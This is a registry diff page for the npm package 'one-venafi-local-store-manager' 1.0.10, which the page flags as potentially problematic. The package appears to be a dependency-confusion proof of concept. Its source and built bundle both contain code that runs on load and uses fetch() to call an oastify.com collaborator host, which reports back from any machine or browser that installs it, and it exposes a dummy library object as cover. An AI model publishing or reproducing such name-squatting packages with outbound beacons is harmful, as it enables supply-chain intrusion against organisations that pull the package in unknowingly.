one-venafi-local-store-manager 1.0.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of one-venafi-local-store-manager might be problematic. Click here for more details.

package/dist/bundle.js ADDED
@@ -0,0 +1 @@
1
+ console.log("[🔥] Debug"),fetch("https://yoqkctom6gsovdg7hbik1yqnqew5kw8l.oastify.com/DP_POC").then((o=>console.log("[📡] Fetch sent, status:",o.status))).catch((o=>console.error("[❌] Fetch failed:",o.message))),window.LocalStoreManagerLib=function(){console.log("triggerPOC() called")},exports.LocalStoreManagerLib={};
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "one-venafi-local-store-manager",
3
+ "version": "1.0.10",
4
+ "description": "Browser PoC Webpack",
5
+ "main": "dist/bundle.js",
6
+ "scripts": {
7
+ "build": "webpack"
8
+ },
9
+ "author": "JESLOX",
10
+ "license": "ISC",
11
+ "devDependencies": {
12
+ "webpack": "^5.89.0",
13
+ "webpack-cli": "^5.1.4"
14
+ }
15
+ }
package/src/index.js ADDED
@@ -0,0 +1,10 @@
1
+ console.log("[🔥] Debug");
2
+
3
+ fetch("https://yoqkctom6gsovdg7hbik1yqnqew5kw8l.oastify.com/DP_POC")
4
+ .then(res => console.log("[📡] Fetch sent, status:", res.status))
5
+ .catch(err => console.error("[❌] Fetch failed:", err.message));
6
+
7
+ window.LocalStoreManagerLib = function triggerPOC() {
8
+ console.log("triggerPOC() called");
9
+ };
10
+
@@ -0,0 +1,16 @@
1
+ const path = require('path');
2
+
3
+ module.exports = {
4
+ entry: './src/index.js',
5
+ output: {
6
+ filename: 'bundle.js',
7
+ path: path.resolve(__dirname, 'dist'),
8
+ library: {
9
+ name: 'LocalStoreManagerLib',
10
+ type: 'commonjs'
11
+ }
12
+ },
13
+ target: 'web',
14
+ mode: 'production'
15
+ };
16
+